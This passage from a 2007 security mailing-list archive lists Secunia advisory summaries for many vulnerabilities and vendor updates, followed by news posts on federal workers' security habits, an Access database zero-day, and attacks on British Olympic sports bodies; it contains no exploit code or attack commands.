exploited by malicious, local users to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/28072/ UNIX/Linux:-- [SA28068] Sun Solaris update for Adobe Flash Player Critical: Highly critical Where: From remote Impact: Exposure of sensitive information, System access Released: 2007-12-12 Sun has issued an update for Adobe Flash Player. This fixes some vulnerabilities, which can be exploited by malicious people to gain knowledge of sensitive information or compromise a user's system. Full Advisory: http://secunia.com/advisories/28068/ -- [SA28056] Red Hat update for java-1.4.2-bea Critical: Highly critical Where: From remote Impact: System access, DoS Released: 2007-12-12 Red Hat has issued an update for java-1.4.2-bea. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) or to compromise a user's system. Full Advisory: http://secunia.com/advisories/28056/ -- [SA28043] Fedora update for poppler Critical: Highly critical Where: From remote Impact: System access Released: 2007-12-11 Fedora has issued an update for poppler. This fixes some vulnerabilities, which can be exploited by malicious people to compromise an application using the library. Full Advisory: http://secunia.com/advisories/28043/ -- [SA28039] SUSE update for OpenOffice_org Critical: Highly critical Where: From remote Impact: System access Released: 2007-12-11 SUSE has issued an update for OpenOffice_org. This fixes a vulnerability, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/28039/ -- [SA28001] Debian update for iceweasel Critical: Highly critical Where: From remote Impact: Cross Site Scripting, DoS, System access Released: 2007-12-10 Debian has issued an update for iceweasel. This fixes some vulnerabilities, which can be exploited by malicious people to conduct cross-site request forgery and cross-site scripting attacks or potentially to compromise a user's system. Full Advisory: http://secunia.com/advisories/28001/ -- [SA27979] Fedora update for seamonkey Critical: Highly critical Where: From remote Impact: Cross Site Scripting, DoS, System access Released: 2007-12-10 Fedora has issued an update for seamonkey. This fixes some vulnerabilities, which can be exploited by malicious people to conduct cross-site scripting and cross-site request forgery attacks and potentially to compromise a user's system. Full Advisory: http://secunia.com/advisories/27979/ -- [SA27972] Fedora update for openoffice.org Critical: Highly critical Where: From remote Impact: System access Released: 2007-12-10 Fedora has issued an update for openoffice.org. This fixes a vulnerability, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/27972/ -- [SA28060] Debian update for ruby-gnome2 Critical: Moderately critical Where: From remote Impact: DoS, System access Released: 2007-12-12 Debian has issued an update for ruby-gnome2. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise an application using the library. Full Advisory: http://secunia.com/advisories/28060/ -- [SA28050] Red Hat update for python Critical: Moderately critical Where: From remote Impact: Exposure of sensitive information, DoS, System access Released: 2007-12-11 Red Hat has issued an update for python. This fixes a security issue and a vulnerability, which can be exploited by malicious people to disclose potentially sensitive information, cause a DoS (Denial of Service), or compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/28050/ -- [SA28044] IBM AIX Multiple Unspecified Vulnerabilities Critical: Moderately critical Where: From remote Impact: Unknown Released: 2007-12-12 Multiple vulnerabilities have been reported in IBM AIX, which have unknown impacts. Full Advisory: http://secunia.com/advisories/28044/ -- [SA28041] Avaya Products PCRE Multiple Vulnerabilities Critical: Moderately critical Where: From remote Impact: Exposure of sensitive information, DoS, System access Released: 2007-12-13 Avaya has acknowledged some vulnerabilities in various Avaya products, which can be exploited by malicious people to disclose sensitive information, cause a DoS (Denial of Service), or potentially compromise an application using the library. Full Advisory: http://secunia.com/advisories/28041/ -- [SA28033] Debian update for kernel Critical: Moderately critical Where: From remote Impact: DoS, System access Released: 2007-12-11 Debian has issued an update for the kernel. This fixes some vulnerabilities, which can be exploited by malicious, local users and by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/28033/ -- [SA28027] Red Hat update for python Critical: Moderately critical Where: From remote Impact: Exposure of sensitive information, DoS, System access Released: 2007-12-11 Red Hat has issued an update for python. This fixes some security issues and a vulnerability, which can be exploited by malicious people to disclose potentially sensitive information, cause a DoS (Denial of Service), or compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/28027/ -- [SA28022] Gentoo update for ruby-gtk2 Critical: Moderately critical Where: From remote Impact: DoS, System access Released: 2007-12-10 Gentoo has issued an update for ruby-gtk2. This fixes a vulnerability, which can potentially be exploited by malicious people to compromise an application using the library. Full Advisory: http://secunia.com/advisories/28022/ -- [SA28021] Gentoo update for emul-linux-x86-qtlibs Critical: Moderately critical Where: From remote Impact: DoS, System access Released: 2007-12-10 Gentoo has issued an update for emul-linux-x86-qtlibs. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise an application using the library. Full Advisory: http://secunia.com/advisories/28021/ -- [SA28008] Debian update for sitebar Critical: Moderately critical Where: From remote Impact: Cross Site Scripting, Exposure of sensitive information, System access Released: 2007-12-10 Debian has issued an update for sitebar. This fixes some vulnerabilities, which can be exploited by malicious people to conduct cross-site scripting attacks, and by malicious users to disclose potentially sensitive information and compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/28008/ -- [SA28002] wwwstats "link" Script Insertion Vulnerability Critical: Moderately critical Where: From remote Impact: Cross Site Scripting Released: 2007-12-10 Jesus Olmos Gonzalez has reported a vulnerability in wwwstats, which can be exploited by malicious people to conduct script insertion attacks. Full Advisory: http://secunia.com/advisories/28002/ -- [SA27996] Debian update for qt-x11-free Critical: Moderately critical Where: From remote Impact: DoS, System access Released: 2007-12-10 Debian has issued an update for qt-x11-free. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise an application using the library. Full Advisory: http://secunia.com/advisories/27996/ -- [SA27989] Fedora update for eggdrop Critical: Moderately critical Where: From remote Impact: System access Released: 2007-12-11 Fedora has issued an update for eggdrop. This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/27989/ -- [SA27985] Gentoo update for cairo Critical: Moderately critical Where: From remote Impact: System access Released: 2007-12-10 Gentoo has issued an update for cairo. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise an application using the library. Full Advisory: http://secunia.com/advisories/27985/ -- [SA27984] Gentoo update for emacs Critical: Moderately critical Where: From remote Impact: System access Released: 2007-12-10 Gentoo has issued an update for emacs. This fixes a vulnerability, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/27984/ -- [SA27975] Fedora update for ruby-gnome Critical: Moderately critical Where: From remote Impact: DoS, System access Released: 2007-12-10 Fedora has issued an update for ruby-gnome. This fixes a vulnerability, which can potentially be exploited by malicious people to compromise an application using the library. Full Advisory: http://secunia.com/advisories/27975/ -- [SA27973] Fedora update for drupal Critical: Moderately critical Where: From remote Impact: Manipulation of data Released: 2007-12-10 Fedora has issued an update for drupal. This fixes a vulnerability, which can be exploited by malicious people to conduct SQL injection attacks. Full Advisory: http://secunia.com/advisories/27973/ -- [SA28067] Mandriva update for samba Critical: Moderately critical Where: From local network Impact: System access Released: 2007-12-12 Mandriva has issued an update for samba. This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/28067/ -- [SA28029] Gentoo update for samba Critical: Moderately critical Where: From local network Impact: System access Released: 2007-12-11 Gentoo has issued an update for samba. This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/28029/ -- [SA28028] rPath update for samba and samba-swat Critical: Moderately critical Where: From local network Impact: System access Released: 2007-12-11 rPath has issued an update for samba and samba-swat. This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/28028/ -- [SA28003] SUSE update for samba Critical: Moderately critical Where: From local network Impact: System access Released: 2007-12-12 SUSE has issued an update for samba. This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/28003/ -- [SA27999] Debian update for samba Critical: Moderately critical Where: From local network Impact: System access Released: 2007-12-11 Debian has issued an update for samba. This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/27999/ -- [SA27993] Slackware update for samba Critical: Moderately critical Where: From local network Impact: System access Released: 2007-12-11 Slackware has issued an update for samba. This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/27993/ -- [SA27982] Gentoo update for firebird Critical: Moderately critical Where: From local network Impact: System access Released: 2007-12-10 Gentoo has issued an update for firebird. This fixes some vulnerabilities, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/27982/ -- [SA27977] Fedora update for samba Critical: Moderately critical Where: From local network Impact: System access Released: 2007-12-11 Fedora has issued an update for samba. This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/27977/ -- [SA28062] Debian update for htdig Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2007-12-12 Debian has issued an update for htdig. This fixes a vulnerability, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/28062/ -- [SA28061] Debian update for libnss-ldap Critical: Less critical Where: From remote Impact: Manipulation of data Released: 2007-12-12 Debian has issued an update for nss-ldap. This fixes a security issue, which can be exploited by malicious persons to manipulate certain data. Full Advisory: http://secunia.com/advisories/28061/ -- [SA28042] Mandriva update for e2fsprogs Critical: Less critical Where: From remote Impact: DoS, System access Released: 2007-12-11 Mandriva has issued an update for e2fsprogs. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise an application using the library. Full Advisory: http://secunia.com/advisories/28042/ -- [SA28030] rPath update for e2fsprogs Critical: Less critical Where: From remote Impact: DoS, System access Released: 2007-12-12 rPath has issued an update for e2fsprogs. This fixes some vulnerabilities, which potentially can be exploited by malicious people to compromise an application using the library. Full Advisory: http://secunia.com/advisories/28030/ -- [SA28000] Ubuntu update for e2fsprogs Critical: Less critical Where: From remote Impact: DoS, System access Released: 2007-12-10 Ubuntu has issued an update for e2fsprogs. This fixes some vulnerabilities, which potentially can be exploited by malicious people to compromise an application using the library. Full Advisory: http://secunia.com/advisories/28000/ -- [SA27987] Debian update for e2fsprogs Critical: Less critical Where: From remote Impact: DoS, System access Released: 2007-12-10 Debian has issued an update for e2fsprogs. This fixes some vulnerabilities, which potentially can be exploited by malicious people to compromise an application using the library. Full Advisory: http://secunia.com/advisories/27987/ -- [SA27983] Gentoo update for PEAR-MDB2 Critical: Less critical Where: From remote Impact: Exposure of sensitive information Released: 2007-12-10 Gentoo has issued an update for PEAR-MDB2. This fixes a security issue, which can be exploited by malicious people to disclose potentially sensitive information. Full Advisory: http://secunia.com/advisories/27983/ -- [SA27980] Fedora update for nagios Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2007-12-10 Fedora has issued an update for nagios. This fixes a vulnerability, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/27980/ -- [SA27971] Avaya Products Apache mod_proxy "date" Denial of Service Critical: Less critical Where: From remote Impact: DoS Released: 2007-12-07 Avaya has acknowledged a vulnerability in various Avaya products, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/27971/ -- [SA27967] Ubuntu update for tetex-bin and texlive-bin Critical: Less critical Where: From remote Impact: Manipulation of data, Exposure of sensitive information, DoS, System access Released: 2007-12-07 Ubuntu has issued an update for tetex-bin and texlive-bin. This fixes some vulnerabilities, which can be exploited by malicious, local users to disclose and manipulate sensitive information and by malicious people to potentially compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/27967/ -- [SA28040] Mandriva update for MySQL Critical: Less critical Where: From local network Impact: Security Bypass, Manipulation of data, DoS Released: 2007-12-11 Mandriva has issued an update for MySQL. This fixes some vulnerabilities, which can be exploited by malicious, local users to manipulate certain data and by malicious users to bypass certain security restrictions or cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/28040/ -- [SA28052] Red Hat autofs "/net" Privilege Escalation Vulnerability Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2007-12-12 A vulnerability has been reported in Red Hat Enterprise Linux, which can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/28052/ -- [SA28023] Gentoo update for lookup Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2007-12-10 Gentoo has issued an update for lookup. This fixes a vulnerability, which can be exploited by malicious, local users to perform certain actions with escalated privileges. Full Advisory: http://secunia.com/advisories/28023/ -- [SA28004] Fedora update for xorg-x11-xfs Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2007-12-11 Fedora has issued an update for xorg-x11-xfs. This fixes some vulnerabilities, which can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/28004/ -- [SA27978] Fedora update for zabbix Critical: Not critical Where: From local network Impact: Privilege escalation Released: 2007-12-10 Fedora has issued an update for zabbix. This fixes a weakness, which can be exploited by malicious users to perform certain actions with escalated privileges. Full Advisory: http://secunia.com/advisories/27978/ -- [SA28070] Linux Kernel "mmap_min_addr" Security Bypass Critical: Not critical Where: Local system Impact: Security Bypass Released: 2007-12-12 A security issue has been reported in the Linux Kernel, which can be exploited by malicious, local users to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/28070/ -- [SA28057] Avaya CMS / IR Solaris Remote Procedure Call Module Denial of Service Critical: Not critical Where: Local system Impact: DoS Released: 2007-12-12 Avaya has acknowledged a vulnerability in Avaya CMS / IR, which can be exploited by malicious, local users to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/28057/ -- [SA28048] Mac OS X "cs_validate_page()" Local Denial of Service Critical: Not critical Where: Local system Impact: DoS Released: 2007-12-13 mu-b has reported a vulnerability in Mac OS X, which can be exploited by malicious, local users to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/28048/ Other:-- [SA27970] IBM HMC Version 3 Privilege Escalation Vulnerabilities Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2007-12-07 Some vulnerabilities have been reported in IBM HMC, which can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/27970/ Cross Platform:-- [SA28066] ViArt CMS/HelpDesk/Shop "root_folder_path" File Inclusion Critical: Highly critical Where: From remote Impact: Exposure of system information, Exposure of sensitive information, System access Released: 2007-12-12 RoMaNcYxHaCkEr has discovered a vulnerability in various ViArt products, which can be exploited by malicious people to disclose sensitive information or to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/28066/ -- [SA28058] CityWriter "path" File Inclusion Vulnerability Critical: Highly critical Where: From remote Impact: System access Released: 2007-12-13 RoMaNcYxHaCkEr has discovered a vulnerability in CityWriter, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/28058/ -- [SA28054] Fastpublish CMS designconfig.php File Inclusion Critical: Highly critical Where: From remote Impact: Exposure of system information, Exposure of sensitive information, System access Released: 2007-12-13 RoMaNcYxHaCkEr has discovered a vulnerability in Fastpublish CMS, which can be exploited by malicious people to disclose sensitive information or to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/28054/ -- [SA28047] Falcon Series One Multiple Vulnerabilities Critical: Highly critical Where: From remote Impact: Cross Site Scripting, System access Released: 2007-12-11 MhZ91 has reported some vulnerabilities in Falcon Series One, which can be exploited by malicious people to conduct script insertion and cross-site request forgery attacks and to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/28047/ -- [SA28018] Sun StarOffice/StarSuite Database Document Processing Arbitrary Java Method Execution Critical: Highly critical Where: From remote Impact: System access Released: 2007-12-10 Sun has acknowledged a vulnerability in Sun StarOffice and StarSuite, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/28018/ -- [SA27974] Novell NetMail AntiVirus Agent Integer Overflow Vulnerability Critical: Highly critical Where: From remote Impact: System access Released: 2007-12-07 A vulnerability has been reported in Novell NetMail, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/27974/ -- [SA28080] Robocode Arbitrary Java Code Execution Security Issue Critical: Moderately critical Where: From remote Impact: Security Bypass Released: 2007-12-13 A security issue has been reported in Robocode, which can be exploited by malicious people to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/28080/ -- [SA28075] MMS Gallery PHP "id" File Inclusion Vulnerabilities Critical: Moderately critical Where: From remote Impact: Exposure of system information, Exposure of sensitive information Released: 2007-12-13 GoLd_M has reported some vulnerabilities in MMS Gallery PHP, which can be exploited by malicious people to disclose sensitive information. Full Advisory: http://secunia.com/advisories/28075/ -- [SA28071] xml2owl "file" Information Disclosure Vulnerability Critical: Moderately critical Where: From remote Impact: Exposure of system information, Exposure of sensitive information Released: 2007-12-13 GoLd_M has discovered a vulnerability in xml2owl, which can be exploited by malicious people to disclose sensitive information. Full Advisory: http://secunia.com/advisories/28071/ -- [SA28053] Mcms Easy Web Make "template" Local File Inclusion Critical: Moderately critical Where: From remote Impact: Exposure of system information, Exposure of sensitive information Released: 2007-12-12 MhZ91 has discovered a vulnerability in Mcms Easy Web Make, which can be exploited by malicious people to disclose sensitive information. Full Advisory: http://secunia.com/advisories/28053/ -- [SA28045] Falt4 CMS Cross-Site Scripting and SQL Injection Vulnerabilities Critical: Moderately critical Where: From remote Impact: Cross Site Scripting, Manipulation of data Released: 2007-12-11 Mesut Timur has reported some vulnerabilities in Falt4 CMS, which can be exploited by malicious people to conduct cross-site scripting and SQL injection attacks. Full Advisory: http://secunia.com/advisories/28045/ -- [SA28035] Cybozu Office Multiple Vulnerabilities Critical: Moderately critical Where: From remote Impact: Cross Site Scripting, DoS Released: 2007-12-11 Some vulnerabilities have been reported in Cybozu Office, which can be exploited by malicious people to conduct cross-site scripting attacks, HTTP header injection attacks, or cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/28035/ -- [SA28014] aurora framework "pack_var()" SQL Injection Vulnerability Critical: Moderately critical Where: From remote Impact: Manipulation of data Released: 2007-12-12 A vulnerability has been reported in aurora framework, which can be exploited by malicious people to conduct SQL injection attacks against applications using the framework. Full Advisory: http://secunia.com/advisories/28014/ -- [SA28013] PolDoc Document Management System "filename" Information Disclosure Critical: Moderately critical Where: From remote Impact: Exposure of system information, Exposure of sensitive information Released: 2007-12-10 GoLd_M has discovered a vulnerability in PolDoc Document Management System (PDDMS), which can be exploited by malicious people to disclose sensitive information. Full Advisory: http://secunia.com/advisories/28013/ -- [SA27990] DWdirectory "search" SQL Injection Vulnerability Critical: Moderately critical Where: From remote Impact: Manipulation of data Released: 2007-12-10 t0pP8uZz & xprog have reported a vulnerability in DWdirectory, which can be exploited by malicious people to conduct SQL injection attacks. Full Advisory: http://secunia.com/advisories/27990/ -- [SA27988] Ace Image Hosting Script "id" SQL Injection Vulnerability Critical: Moderately critical Where: From remote Impact: Manipulation of data Released: 2007-12-10 t0pP8uZz & xprog have reported a vulnerability in Ace Image Hosting Script, which can be exploited by malicious people to conduct SQL injections attacks. Full Advisory: http://secunia.com/advisories/27988/ -- [SA27986] Content Injector "id" SQL Injection Vulnerability Critical: Moderately critical Where: From remote Impact: Manipulation of data, Exposure of sensitive information Released: 2007-12-10 S.W.A.T. has discovered a vulnerability in Content Injector, which can be exploited by malicious people to conduct SQL injection attacks. Full Advisory: http://secunia.com/advisories/27986/ -- [SA28082] Hitachi Web Server Cross-Site Scripting Vulnerabilities Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2007-12-13 Hitachi has acknowledged some vulnerabilities in the Hitachi Web Server, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/28082/ -- [SA28081] Apache mod_imap Module Cross-Site Scripting Vulnerability Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2007-12-13 A vulnerability has been reported in the mod_imap module for Apache, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/28081/ -- [SA28078] BEA WebLogic Mobility Server Image Converter Security Bypass Critical: Less critical Where: From remote Impact: Security Bypass Released: 2007-12-13 A vulnerability has been reported in the BEA WebLogic Mobility Server, which can be exploited by malicious people to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/28078/ -- [SA28077] JBoss Seam "order" EJBQL Injection Vulnerability Critical: Less critical Where: From remote Impact: Manipulation of data Released: 2007-12-13 A vulnerability has been reported in JBoss Seam, which potentially can be exploited by malicious people to conduct SQL injection attacks against applications using the framework. Full Advisory: http://secunia.com/advisories/28077/ -- [SA28073] Apache mod_imap Module Cross-Site Scripting Vulnerability Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2007-12-12 A vulnerability has been reported in the mod_imap module for Apache, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/28073/ -- [SA28069] Rainboard Unspecified Cross-Site Scripting Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2007-12-12 A vulnerability has been reported in Rainboard, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/28069/ -- [SA28063] MySQL Security Issue and Two Vulnerabilities Critical: Less critical Where: From remote Impact: Manipulation of data, Privilege escalation, DoS Released: 2007-12-12 A security issue and two vulnerabilities have been reported in MySQL, which can be exploited by malicious users to gain escalated privileges, manipulate certain data, or to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/28063/ -- [SA28049] Cybozu Products Cross-Site Scripting and HTTP Header Injection Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2007-12-11 Some vulnerabilities have been reported in Cybozu products, which can be exploited by malicious people to conduct cross-site scripting and HTTP header injection attacks. Full Advisory: http://secunia.com/advisories/28049/ -- [SA28046] Apache mod_imagemap Module Cross-Site Scripting Vulnerability Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2007-12-12 A vulnerability has been reported in the mod_imagemap module for Apache, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/28046/ -- [SA28024] bitweaver Cross-Site Scripting Vulnerabilities Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2007-12-10 DoZ has discovered some vulnerabilities in bitweaver, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/28024/ -- [SA28012] Serendipity Remote RSS Sidebar Plugin Script Insertion Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2007-12-10 A vulnerability has been reported in Serendipity, which can be exploited by malicious people to conduct script-insertion attacks. Full Advisory: http://secunia.com/advisories/28012/ -- [SA28006] WebSPELL Multiple Cross-Site Scripting Vulnerabilities Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2007-12-11 Brainhead has discovered some vulnerabilities in WebSPELL, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/28006/ -- [SA28005] WordPress GBK/Big5 Character Set "s" SQL Injection Critical: Less critical Where: From remote Impact: Manipulation of data, Exposure of sensitive information Released: 2007-12-11 Abel Cheung has discovered a vulnerability in WordPress, which can be exploited by malicious people to conduct SQL injection attacks. Full Advisory: http://secunia.com/advisories/28005/ -- [SA27966] OpenNewsletter "type" Cross-Site Scripting Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2007-12-07 Manuel Fernandez has discovered a vulnerability in OpenNewsletter, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/27966/ -- [SA28026] Websense User-Agent Filtering Bypass Security Issue Critical: Less critical Where: From local network Impact: Security Bypass Released: 2007-12-13 mrhinkydink has reported a security issue in Websense, which can be exploited by malicious people to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/28026/ -- [SA27981] MySQL System Table Information Overwrite Vulnerability Critical: Less critical Where: Local system Impact: Manipulation of data Released: 2007-12-10 A vulnerability has been reported in MySQL, which can be exploited by malicious, local users to manipulate certain data. Full Advisory: http://secunia.com/advisories/27981/ ======================================================================== Secunia recommends that you verify all advisories you receive, by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Subscribe: http://secunia.com/secunia_weekly_summary/ Contact details: Web : http://secunia.com/ E-mail : support@secunia.com Tel : +45 70 20 51 44 Fax : +45 70 20 51 45 From alerts at infosecnews.org Fri Dec 14 00:21:41 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Test feds' info security savvy, report suggests Message-ID: http://www.fcw.com/online/news/151066-1.html By Mary Mosquera FCW.com December 13, 2007 A majority of federal workers continue to violate information security policies despite being aware of threats to agency systems and knowing the importance of following data security policies, a survey by SecureInfo found. Among federal workers, 22 percent said they believe their co-workers follow information security policies and procedures half the time or less. About 58 percent said they stick to them very frequently. Only 20 percent said their co-workers adhere to them all the time. Although 97 percent of the participants said they were required to take information security training, awareness training is not enough. Only one-third said they remembered most of the material covered in the training, said Christopher Fountain, SecureInfo president and chief executive officer. Only 48 percent said their agency tested them, according to the report on information security awareness from the perspective of government workers. There seems to be a significant lack of understanding by the government worker that each individual plays a critical role in protecting information assets and contributes to an agencys information security posture, he said in the Dec. 10 report. A greater sense of urgency is required." Cyberattackers now use more sophisticated and stealthier techniques to exploit user trust, such as phishing, a technique to fool online users into divulging sensitive information. This makes the human element in information security the most unpredictable and critical vulnerability of an agencys systems, according to the September survey of 100 federal employees and contractors. In its previous security awareness survey in May, SecureInfo found that many federal employees were unfamiliar with the Federal Information Security Management Act, and FISMA compliance is often viewed as a headache instead of a framework for improving system and data protection. In its latest report, SecureInfo said agencies should test and hold their employees accountable to make sure that they understand and follow data security policies and procedures. Only 36 percent said that their knowledge of security policies and procedure was part of their annual performance review, Fountain said. Agencies also should conduct random evaluations of employees retention of security training content through social-engineering penetration testing techniques, such as attempts to get employees to share user ID and password information. It is also critical to understand whether awareness training is effective and hold agencies accountable for it, Fountain said. Agency leadershipshould be required to publicly report on the effectiveness of training programs, he said. With the appropriate focus on security awareness and accountability, federal workers will do a better job of protecting government information and systems. From alerts at infosecnews.org Fri Dec 14 00:21:56 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Attackers Targeting Zero-Day Access Flaw Message-ID: http://www.eweek.com/article2/0,1895,2234056,00.asp By Lisa Vaas eWEEK.com December 13, 2007 Attackers are going after Microsoft Office Access databases, US-CERT warned earlier in the week, taking advantage of an unpatched stack buffer overflow to deliver malicious databases that are leading to system hijacking in an undetermined number of cases. Security researchers didn't have many details on the attacks, but US-CERT's advisory did say that users don't have to do anything beyond open a rigged Access database in order for a successful exploit to be sprung on them. The malicious files are of file type .MDB. McAfee's Avert Labs said in a Dec. 12 posting that attacks could come via a number of vectors: via the Web, e-mail or instant messaging, "coupled with well-establishing social engineering techniques" to trick victims into launching an attachment that's been booby trapped. US-CERT is recommending that, in lieu of a patch, users take these mitigation steps: * Avoid opening attachments from people they don't know or trust or that they haven't solicited. * Block high-risk file attachments at e-mail gateways. Microsoft Director of Security Response Mark Miller said in a statement that, "Microsoft is aware of public reports of a malicious Microsoft Access Database file being used to compromise users," though he didn't provide information on how widespread the attack is at this point. The file type in question.MDBis considered unsafe, Miller noted, since it's one of multiple file types that allow embedded script operations. Macros in Word files (*.doc) or in Excel files (*.xls) are other examples of file types that can be risky because of their less-than-obvious leniency on embedded scripts, according to this Microsoft support page on unsafe file types. .MDB was used by Access Database versions up until 2003 and is either blocked by some Microsoft applications or provokes warnings before users can open such files, Miller said in his statement. From alerts at infosecnews.org Fri Dec 14 00:22:11 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Britain teams bound for Beijing put on alert as hackers spark web of intrigue Message-ID: http://www.timesonline.co.uk/tol/sport/more_sport/article3048428.ece By Owen Slot Chief Sports Reporter The Times December 14, 2007 Computer hackers in China have broken into the information databases of the governing bodies of two British Olympic sports and, The Times can reveal, the Olympic family in the UK has been alerted that, with the Beijing Games less than eight months away, those threatening their security may be doing so to gain an illegal competitive advantage. The first sport targeted was GB Canoeing, which was hit in October. The other Olympic sports in Britain were immediately informed, but the IT system of the Amateur Boxing Association of England (ABAE) was then subject to eight attacks over a three-week period and two investigations have traced all this activity back to internet protocol (IP) addresses in China. This wasnt kids mucking around, Paul King, the ABAE chief executive, said. This was a real professional job. Fears that these crimes may have been staged to steal information to help the perpetrators in the Games next summer were confirmed on Wednesday in an e-mail seen by The Times, which was part of the report delivered by Synergic UK Ltd, the IT partner of GB Canoeing that carried out the investigation into the attack on the website. The report said: In this case the source was China and the type of attack highly sophisticated and targeted. Fortunately, the servers involved held no performance data and it is our belief that this was the information being sought. The review by Synergic into the security of the GB Canoeing websites servers worryingly exposed a lack of understanding of data security issues and the very real threats posed in the run-up to and in the Games themselves. It also advised that it is vital that staff are aware that there is a genuine threat to and indeed focus on gaining access to information that could be of help to the competition. GB Canoeing and the ABAE are confident that no critical information has been stolen. Paul Owen, the chief executive of GB Canoeing, said that if such information was what the attackers were after, they were looking in the wrong place. King, however, explained that the attack on the ABAE systems, if more successful, could have been costly from a competitive point of view. We have all our individual assessments for all our boxers their strengths, their weaknesses stored on our system, he said. We also hold information on the international competition. Take Alexey Tishchenko [the Olympic champion from Russia], for instance, who Frankie Gavin [the British lightweight who has qualified for Beijing] beat in the World Championships recently. No one had beaten him for four years and our postfight analysis what we did to beat him that no one else had done might well be useful. Despite the security investigations, no one can be sure of the motives of the hackers or even their origin. And because the IP addresses were Chinese does not necessarily rule out the possibility of another foreign national working from a Chinese address. Indeed, the systems were subject to viruses and may simply have been a victim of sabotage, although the fact that two Olympic bodies were targeted within such a short space of time has fuelled fears that this may be a crime of a sporting nature. The British Olympic Association (BOA) confirmed yesterday that it has been sufficiently concerned to have informed the IOC. Attention was drawn to us about this situation, Simon Clegg, the BOA chief executive, said. I thought we had a responsibility to share it with the Olympic family. It is a real danger when you consider how much information is held electronically. I simply dont know who is behind this, but I am concerned about the amount of information we hold in this way. Owen said: We were concerned that data had been 